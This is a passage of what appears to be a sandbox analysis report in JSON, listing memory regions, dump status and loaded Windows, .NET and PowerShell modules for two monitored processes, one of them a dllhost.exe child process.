"process_00000003-region_00000492-addr_0x0000000004b50000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 78970880, "type": "region", "version": 1 }, "end_va": 79626239, "entry_point": 0, "filename": null, "id": "region_492", "name": "private_0x0000000004b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 78970880, "timestamp": "00:00:40.258", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000493-addr_0x0000000004d40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 81002496, "type": "region", "version": 1 }, "end_va": 81264639, "entry_point": 0, "filename": null, "id": "region_493", "name": "private_0x0000000004d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 81002496, "timestamp": "00:00:40.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1922236416, "type": "region", "version": 1 }, "end_va": 1933737983, "entry_point": 1922236416, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_494", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1922236416, "timestamp": "00:00:40.259", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000495-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_495", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:00:40.283", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000496-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_496", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:00:40.283", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000497-addr_0x0000000000510000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_497", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:00:40.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 81264640, "type": "region", "version": 1 }, "end_va": 84287487, "entry_point": 81264640, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_498", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 81264640, "timestamp": "00:00:40.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1914241024, "type": "region", "version": 1 }, "end_va": 1922220031, "entry_point": 1914241024, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_499", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1914241024, "timestamp": "00:00:40.864", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1946550272, "type": "region", "version": 1 }, "end_va": 1947078655, "entry_point": 1946550272, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_500", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1946550272, "timestamp": "00:00:40.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1905328128, "type": "region", "version": 1 }, "end_va": 1914216447, "entry_point": 1905328128, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll", "id": "region_501", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1905328128, "timestamp": "00:00:41.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1943470080, "type": "region", "version": 1 }, "end_va": 1946492927, "entry_point": 1946151966, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_502", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1943470080, "timestamp": "00:00:41.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 5386239, "entry_point": 5373952, "filename": "\\Windows\\SysWOW64\\l_intl.nls", "id": "region_504", "name": "l_intl.nls", "norm_filename": "c:\\windows\\syswow64\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 5373952, "timestamp": "00:00:41.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 79626240, "type": "region", "version": 1 }, "end_va": 80412671, "entry_point": 79626240, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_505", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 79626240, "timestamp": "00:00:41.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1966538752, "type": "region", "version": 1 }, "end_va": 1966559231, "entry_point": 1966538752, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_506", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1966538752, "timestamp": "00:00:41.317", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000507-addr_0x0000000000530000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 5443583, "entry_point": 0, "filename": null, "id": "region_507", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:00:41.380", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 31850496, "type": "region", "version": 1 }, "end_va": 31870975, "entry_point": 31850496, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_508", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 31850496, "timestamp": "00:00:41.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 44630016, "type": "region", "version": 1 }, "end_va": 44896255, "entry_point": 44630016, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_509", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 44630016, "timestamp": "00:00:41.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 31948799, "entry_point": 31916032, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_512", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 31916032, "timestamp": "00:00:42.052", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32247807, "entry_point": 0, "filename": null, "id": "region_513", "name": "pagefile_0x0000000001ec0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32243712, "timestamp": "00:00:42.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 80412672, "type": "region", "version": 1 }, "end_va": 80687103, "entry_point": 80412672, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_514", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 80412672, "timestamp": "00:00:42.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 274432, "start_va": 1739194368, "type": "region", "version": 1 }, "end_va": 1739468799, "entry_point": 1739452476, "filename": "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_515", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 1739194368, "timestamp": "00:00:42.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 638976, "start_va": 1935474688, "type": "region", "version": 1 }, "end_va": 1936113663, "entry_point": 1935474688, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll", "id": "region_516", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 1935474688, "timestamp": "00:00:42.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2314240, "start_va": 1936130048, "type": "region", "version": 1 }, "end_va": 1938444287, "entry_point": 1936130048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll", "id": "region_517", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 1936130048, "timestamp": "00:00:42.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 544768, "start_va": 1939406848, "type": "region", "version": 1 }, "end_va": 1939951615, "entry_point": 1939406848, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll", "id": "region_518", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 1939406848, "timestamp": "00:00:42.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 307200, "start_va": 1939996672, "type": "region", "version": 1 }, "end_va": 1940303871, "entry_point": 1939996672, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_519", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 1939996672, "timestamp": "00:00:42.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 1955397632, "type": "region", "version": 1 }, "end_va": 1955549183, "entry_point": 1955397632, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll", "id": "region_520", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 1955397632, "timestamp": "00:00:42.097", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32313343, "entry_point": 0, "filename": null, "id": "region_521", "name": "pagefile_0x0000000001ed0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32309248, "timestamp": "00:00:42.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1614020608, "type": "region", "version": 1 }, "end_va": 1614053375, "entry_point": 1614020608, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll", "id": "region_522", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 1614020608, "timestamp": "00:00:42.648", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\syswow64\\dllhost.exe", "filename": "c:\\windows\\syswow64\\dllhost.exe", "id": "proc_4", "image_name": "dllhost.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000570-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_570", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.116", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000571-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_571", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:47.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_572", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:00:47.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_573", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:47.119", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000574-addr_0x0000000000130000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_574", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:00:47.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1658879, "entry_point": 1638400, "filename": "\\Windows\\SysWOW64\\dllhost.exe", "id": "region_575", "name": "dllhost.exe", "norm_filename": "c:\\windows\\syswow64\\dllhost.exe", "region_type": "memory_mapped_file", "start_va": 1638400, "timestamp": "00:00:47.119", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000576-addr_0x0000000000270000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_576", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:00:47.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2000158720, "type": "region", "version": 1 }, "end_va": 2001899519, "entry_point": 2000158720, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_577", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2000158720, "timestamp": "00:00:47.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2002124800, "type": "region", "version": 1 }, "end_va": 2003697663, "entry_point": 2002124800, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_578", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002124800, "timestamp": "00:00:47.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_579", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:47.129", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000580-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_580", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:47.129", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000581-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_581", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:47.130", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000582-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_582", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:47.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_583", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:47.130", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000584-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_584", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:47.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_585", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:47.130", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000586-addr_0x0000000000060000-size_0x0000000000004000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 409599, "entry_point": 0, "filename": null, "id": "region_586", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:00:47.131", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000587-addr_0x0000000000410000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_587", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:47.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1940324352, "type": "region", "version": 1 }, "end_va": 1940701183, "entry_point": 1940584344, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_588", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1940324352, "timestamp": "00:00:47.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1940717568, "type": "region", "version": 1 }, "end_va": 1940975615, "entry_point": 1940905592, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_589", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1940717568, "timestamp": "00:00:47.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1941176320, "type": "region", "version": 1 }, "end_va": 1941209087, "entry_point": 1941184760, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_590", "name": 